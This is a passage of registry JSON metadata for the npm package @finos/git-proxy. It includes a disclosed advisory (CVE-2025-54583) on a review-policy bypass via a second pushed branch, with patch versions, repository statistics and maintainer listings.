remote, and second branch bypasses the proxy.\n\n### Impact\nAttackers with push access can bypass review policies, potentially inserting unwanted/malicious code into a GitProxy-protected repository.\n\nThe vulnerability impacts all users or organizations relying on GitProxy to enforce policies and prevent unapproved changes. It requires no elevated privileges beyond regular push access, and no extra user interaction. It does however, require a GitProxy administrator or designated user (`canUserApproveRejectPush`) to approve the first push. It is much more likely that a well-meaning user would trigger this accidentally.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:34:50.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-qr93-8wwf-22g4","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/commit/bd2ecb2099cba21bca3941ee4d655d2eb887b3a9","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54583","https://github.com/advisories/GHSA-qr93-8wwf-22g4"],"source_kind":"github","identifiers":["GHSA-qr93-8wwf-22g4","CVE-2025-54583"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:09:12.391Z","updated_at":"2026-04-18T05:02:22.182Z","epss_percentage":0.00059,"epss_percentile":0.18555,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@finos/git-proxy","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@finos/git-proxy","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@finos/git-proxy/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-15T10:02:29.989Z","issues_count":195,"pull_requests_count":1023,"avg_time_to_close_issue":15027298.333333334,"avg_time_to_close_pull_request":939538.0789793439,"issues_closed_count":87,"pull_requests_closed_count":823,"pull_request_authors_count":52,"issue_authors_count":40,"avg_comments_per_issue":1.6307692307692307,"avg_comments_per_pull_request":2.8426197458455524,"merged_pull_requests_count":715,"bot_issues_count":5,"bot_pull_requests_count":592,"past_year_issues_count":76,"past_year_pull_requests_count":266,"past_year_avg_time_to_close_issue":2560840.9583333335,"past_year_avg_time_to_close_pull_request":687520.6457142857,"past_year_issues_closed_count":24,"past_year_pull_requests_closed_count":175,"past_year_pull_request_authors_count":13,"past_year_issue_authors_count":13,"past_year_avg_comments_per_issue":0.8289473684210527,"past_year_avg_comments_per_pull_request":2.9962406015037595,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":91,"past_year_merged_pull_requests_count":163,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/issues","maintainers":[{"login":"JamieSlome","count":165,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JamieSlome"},{"login":"maoo","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/maoo"},{"login":"grovesy","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/grovesy"},{"login":"TheJuanAndOnly99","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheJuanAndOnly99"},{"login":"robmoffat","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/robmoffat"},{"login":"coopernetes","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/coopernetes"},{"login":"mcleo-d","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mcleo-d"},{"login":"BrunoBerisso","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BrunoBerisso"},{"login":"finos-admin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/finos-admin"}],"active_maintainers":[{"login":"JamieSlome","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JamieSlome"},{"login":"TheJuanAndOnly99","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheJuanAndOnly99"},{"login":"coopernetes","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/coopernetes"},{"login":"mcleo-d","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mcleo-d"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/codemeta","maintainers":[{"uuid":"texodus","login":"texodus","name":null,"email":"steinlink@gmail.com","url":null,"packages_count":142,"html_url":"https://www.npmjs.com/~texodus","role":null,"created_at":"2023-06-28T05:57:54.110Z","updated_at":"2023-06-28T05:57:54.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/texodus/packages"},{"uuid":"finos-admin","login":"finos-admin","name":null,"email":"infra@finos.org","url":null,"packages_count":123,"html_url":"https://www.npmjs.com/~finos-admin","role":null,"created_at":"2023-06-28T05:57:53.263Z","updated_at":"2023-06-28T05:57:53.263Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/finos-admin/packages"},{"uuid":"maoo","login":"maoo","name":null,"email":"maurizio@session.it","url":null,"packages_count":124,"html_url":"https://www.npmjs.com/~maoo","role":null,"created_at":"2023-06-28T05:57:53.608Z","updated_at":"2023-06-28T05:57:53.608Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/maoo/packages"},{"uuid":"neil.slinger","login":"neil.slinger","name":null,"email":"neil.slinger@gmail.com","url":null,"packages_count":123,"html_url":"https://www.npmjs.com/~neil.slinger","role":null,"created_at":"2023-06-28T05:57:55.012Z","updated_at":"2023-06-28T05:57:55.012Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/neil.slinger/packages"}]}